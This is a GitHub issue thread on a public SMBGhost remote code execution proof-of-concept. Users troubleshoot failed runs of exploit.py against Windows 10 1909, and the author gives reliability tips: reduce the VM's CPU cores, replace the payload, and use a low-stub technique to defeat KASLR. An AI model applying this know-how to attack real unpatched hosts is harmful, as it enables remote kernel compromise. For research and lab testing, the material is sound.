search

chompie1337 / SMBGhost_RCE_PoC

1.32k stars 348 forks source link

Win 1909 Enterprise socket timeout #9

Open 0xShkk opened 4 years ago

0xShkk commented 4 years ago

Followup on https://github.com/chompie1337/SMBGhost_RCE_PoC/issues/5#issue-629977267

chompie1337 commented 4 years ago

hi, how many times have you tried? what is the stop code? thank you

MagicNieh commented 4 years ago

Hi. My stop code is "overwrote HalpInterruptController pointer, should have execution shortly...", but I didn't get shell.

0xShkk commented 4 years ago

Hello,

have tried it like 5 times or so. Everytime the bluescreen was immediately trigged without the python script giving me any output but immediately timeout (because windows was down obviously).

BUT I was trying it again just now and discovered that I have accidentally used python version 2.7.18 which forces the described crash reliably..

Windows error code:

KMODE EXCEPTION NOT HANDLED

Sorry for confusion!

Tried it again then with python3 like 10 times.

Get this result every time:

python3 exploit.py -ip 192.168.100.51 [+] found low stub at phys addr 13000! [+] PML4 at 1aa000 [+] base of HAL heap at fffff7e380000000 [+] found PML4 self-ref entry 162 Traceback (most recent call last): File "exploit.py", line 466, in do_rce(args.ip, args.port) File "exploit.py", line 429, in do_rce search_hal_heap(ip, port) File "exploit.py", line 325, in search_hal_heap phys_addr = get_phys_addr(ip, port, index) File "exploit.py", line 262, in get_phys_addr pte_buff = read_physmem_primitive(ip, port, pte) File "exploit.py", line 206, in read_physmem_primitive buff = try_read_physmem_primitive(ip, port, phys_addr) File "exploit.py", line 221, in try_read_physmem_primitive buff = sock.recv(1000) socket.timeout: timed out

0xShkk commented 4 years ago

Got Bluescreen now with correct execution (py3)

Win error:

IRQL NOT LESS OR EQUAL

0xShkk commented 4 years ago

Get BLs now reliable with IRQL NOT LESS OR EQUAL error after second to fourth execution of exploit.py

chompie1337 commented 4 years ago

Hi. My stop code is "overwrote HalpInterruptController pointer, should have execution shortly...", but I didn't get shell.

did you replace payload like it says in the README?

MagicNieh commented 4 years ago

Thank you for your reply. I have reproduced it successfully.

Stab1el commented 4 years ago

Thank you for your reply. I have reproduced it successfull

could you please show your successful working environment? Since I got read primitive failed on Vmware + win10 1909

wanghualei2 commented 4 years ago

hello,I can't find low_stub,can you tell why your code write so,do you study some paper?

wanghualei2 commented 4 years ago

what is low stub? why you write so to get it?

MagicNieh commented 4 years ago

Thank you for your reply. I have reproduced it successfull

could you please show your successful working environment? Since I got read primitive failed on Vmware + win10 1909

This exploit code has a low success rate. I tried it more than ten times before it succeeded once.

chompie1337 commented 4 years ago

Reducing the number of processor cores in the VM increases reliability due to the physical read primitive.

chompie1337 commented 4 years ago

what is low stub? why you write so to get it? I got the idea from Alex Ioenscu's research. It is to have a reliable way to defeat KASLR with only a physical read primitive. It may not present on all VMs, but I've seen it on most. Here's the talk, relevant portion @ 38 minutes https://www.youtube.com/watch?v=RSV3f6aEJFY

wanghualei2 commented 4 years ago

I think your code only success on win10 with UEFI,I always failed on win10 with BIOS.DO you have some suggestion?